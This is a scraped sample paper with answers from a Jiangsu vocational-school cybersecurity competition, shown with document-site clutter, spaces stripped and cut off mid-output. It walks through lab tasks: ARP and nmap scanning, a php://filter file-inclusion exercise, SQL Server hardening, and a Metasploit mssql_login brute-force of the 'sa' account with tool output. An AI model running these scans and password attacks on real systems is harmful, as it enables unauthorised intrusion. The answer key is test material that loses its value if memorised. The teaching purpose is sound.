江苏省度中职组网络空间安全赛项样题及答案Word格式.docx

上传人:b****3 文档编号:16849073 上传时间:2022-11-26 格式:DOCX 页数:16 大小:87.54KB
下载 相关 举报
江苏省度中职组网络空间安全赛项样题及答案Word格式.docx_第1页
第1页 / 共16页
江苏省度中职组网络空间安全赛项样题及答案Word格式.docx_第2页
第2页 / 共16页
江苏省度中职组网络空间安全赛项样题及答案Word格式.docx_第3页
第3页 / 共16页
江苏省度中职组网络空间安全赛项样题及答案Word格式.docx_第4页
第4页 / 共16页
江苏省度中职组网络空间安全赛项样题及答案Word格式.docx_第5页
第5页 / 共16页
点击查看更多>>
下载资源
资源描述

江苏省度中职组网络空间安全赛项样题及答案Word格式.docx

《江苏省度中职组网络空间安全赛项样题及答案Word格式.docx》由会员分享,可在线阅读,更多相关《江苏省度中职组网络空间安全赛项样题及答案Word格式.docx(16页珍藏版)》请在冰豆网上搜索。

江苏省度中职组网络空间安全赛项样题及答案Word格式.docx

第二阶段分组对抗

系统加固

11:

30

渗透测试

15-12:

三、竞赛任务书内容

(一)拓扑图

(二)第一阶段任务书

任务1.ARP扫描渗透测试

任务环境说明:

✓服务器场景:

CentOS5.5

✓服务器场景操作系统:

1.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;

Arping–c5x.x.x.x

2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;

root@kali:

~#arping-c5192.168.28.122

ARPING192.168.28.122from192.168.28.100eth0

Unicastreplyfrom192.168.28.122[00:

0C:

29:

62:

80:

73]1.017ms

73]0.638ms

73]1.051ms

73]1.590ms

Sent5probes(1broadcast(s))

Received5response(s)

Flag:

5

3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:

字符串1/字符串2/字符串3/…/字符串n)提交;

msf>

useauxiliary/scanner/discovery/arp_sweep

Auxiliary/scanner/discovery/arp_sweep

4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;

msf>

msfauxiliary(arp_sweep)>

run

[*]192.168.28.122appearstobeup(VMware,Inc.).

[*]192.168.28.2appearstobeup(VMware,Inc.).

[*]Scanned1of1hosts(100%complete)

[*]Auxiliarymoduleexecutioncompleted

completed

5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;

appears

6.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;

exploitorrun

任务2.操作系统及应用程序扫描渗透测试

1.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;

Nmap–n–Spx.x.x.x

2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;

~#nmap-n-sP192.168.28.122

StartingNmap7.40(https:

//nmap.org)at2017-12-1019:

59EST

Nmapscanreportfor192.168.28.122

Hostisup(0.00069slatency).

Nmapdone:

1IPaddress(1hostup)scannedin0.09seconds

up

3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;

~#nmap-n-A192.168.28.122

//nmap.org)at2017-12-1020:

11EST

Hostisup(0.00025slatency).

Notshown:

998closedports

PORTSTATESERVICEVERSION

22/tcpopensshOpenSSH4.3(protocol2.0)

|ssh-hostkey:

|102495:

7e:

e7:

af:

67:

6f:

3b:

ad:

dd:

4d:

37:

a6:

34:

ac:

6c:

08(DSA)

|_204890:

3f:

56:

9b:

cd:

c7:

5b:

aa:

1c:

40:

57:

45:

c4:

c1:

cd(RSA)

111/tcpopenrpcbind2(RPC#100000)

|rpcinfo:

|programversionport/protoservice

|1000002111/tcprpcbind

|1000002111/udprpcbind

|1000241910/udpstatus

|_1000241913/tcpstatus

MACAddress:

00:

73(VMware)

Devicetype:

generalpurpose

Running:

Linux2.6.X

OSCPE:

cpe:

/o:

linux:

linux_kernel:

2.6

OSdetails:

Linux2.6.9-2.6.30

NetworkDistance:

1hop

TRACEROUTE

HOPRTTADDRESS

10.25ms192.168.28.122

OSandServicedetectionperformed.Pleasereportanyincorrectresultsathttps:

//nmap.org/submit/.

1IPaddress(1hostup)scannedin8.22seconds

Nmap–n–Ax.x.x.x

4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;

seconds

5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;

~#nmap-O192.168.28.122

13EST

Hostisup(0.00044slatency).

PORTSTATESERVICE

22/tcpopenssh

111/tcpopenrpcbind

OSdetectionperformed.Pleasereportanyincorrectresultsathttps:

1IPaddress(1hostup)scannedin14.80seconds

Nmap–Ox.x.x.x

6.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;

Nmap–sVx.x.x.x

7.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;

~#nmap-sV192.168.28.122

17EST

Hostisup(0.00014slatency).

Servicedetectionperformed.Pleasereportanyincorrectresultsathttps:

1IPaddress(1hostup)scannedin19.60seconds

OpenSSH4.3

任务3.Web应用程序文件包含安全攻防

✓服务器场景名称:

WebServ2003

✓服务器场景安全操作系统:

MicrosoftWindows2003Server

✓服务器场景安装中间件:

Apache2.2;

✓服务器场景安装Web开发环境:

Php6;

✓服务器场景安装数据库:

MicrosoftSqlServer2000;

✓服务器场景安装文本编辑器:

EditPlus;

1.访问WebServ2003服务器场景,"

/"

->

"

DisplayUploaded'

sFileContent"

,分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:

name=“变量名”)提交;

2.对该任务题目1页面注入点进行渗透测试,通过php:

//filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:

AppServ/Apache2.2/logs/flag.log的内容,并将注入语句作为Flag提交;

3.对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;

4.通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;

5.进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:

F1|F2|F3|F4);

6.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;

任务4.数据库安全加固

 

1.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;

2.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat–an命令,将回显的数据库服务连接状态作为Flag提交;

C:

\DocumentsandSettings\Administrator>

netstat-an

ActiveConnections

ProtoLocalAddressForeignAddressState

TCP0.0.0.0:

1350.0.0.0:

0LISTENING

4450.0.0.0:

10250.0.0.0:

14330.0.0.0:

TCP192.168.28.131:

1390.0.0.0:

UDP0.0.0.0:

445*:

*

500*:

1434*:

4500*:

UDP127.0.0.1:

123*:

UDP192.168.28.131:

137*:

138*:

LISTENING

3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;

useauxiliary/scanner/mssql/mssql_ping

msfauxiliary(mssql_ping)>

[*]192.168.28.131:

-SQLServerinformationfor192.168.28.131:

[+]192.168.28.131:

-ServerName=SERVER

-InstanceName=MSSQLSERVER

-IsClustered=No

-Version=8.00.194

-tcp=1433

-np=\\SERVER\pipe\sql\query

4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交;

useauxiliary/scanner/mssql/mssql_login

msfauxiliary(mssql_login)>

setusernamesa

setpass_file/usr/share/wordlists/metasploit/password.lst

msfauxiliary(mssql_login)>

1433-192.168.28.131:

1433-MSSQL-Startingauthenticationscanner.

[!

]192.168.28.131:

1433-NoactiveDB--Credentialdatawillnotbesaved!

[-]192.168.28.131:

1433-LOGINFAILED:

WORKSTATION\sa:

!

@#$%(Incorrect:

@#$%^(Incorrect:

@#$%^&

(Incorrect:

*(Incorrect:

boerbul(Incorrect:

boerseun(Incorrect:

[-]192.168.28.

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 工作范文 > 行政公文

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1